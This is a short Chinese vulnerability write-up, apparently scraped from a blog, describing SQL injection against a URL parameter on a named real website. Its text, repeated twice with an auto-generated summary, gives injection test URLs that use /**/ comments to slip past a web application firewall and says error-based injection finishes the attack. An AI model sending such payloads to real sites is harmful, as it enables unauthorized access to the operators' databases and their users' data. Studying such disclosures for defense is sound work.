漏洞细节

有waf,比较好绕 空格用/**/替换
http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=1--+
http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=2--+
根据返回判断存在注入
不过注入语句有长度限制

最后可用报错注入
本文介绍了一种利用特殊字符绕过WAF进行SQL注入的方法,通过使用/**/替换空格,成功实现了对目标网站的漏洞利用。文中提供了具体的URL示例,展示了如何构造注入语句并判断是否存在注入点。值得注意的是,该方法受限于注入语句的长度,但最终可通过报错注入完成攻击。

有waf,比较好绕 空格用/**/替换
http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=1--+
http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=2--+
根据返回判断存在注入
不过注入语句有长度限制

最后可用报错注入
1712
1145

被折叠的 条评论
为什么被折叠?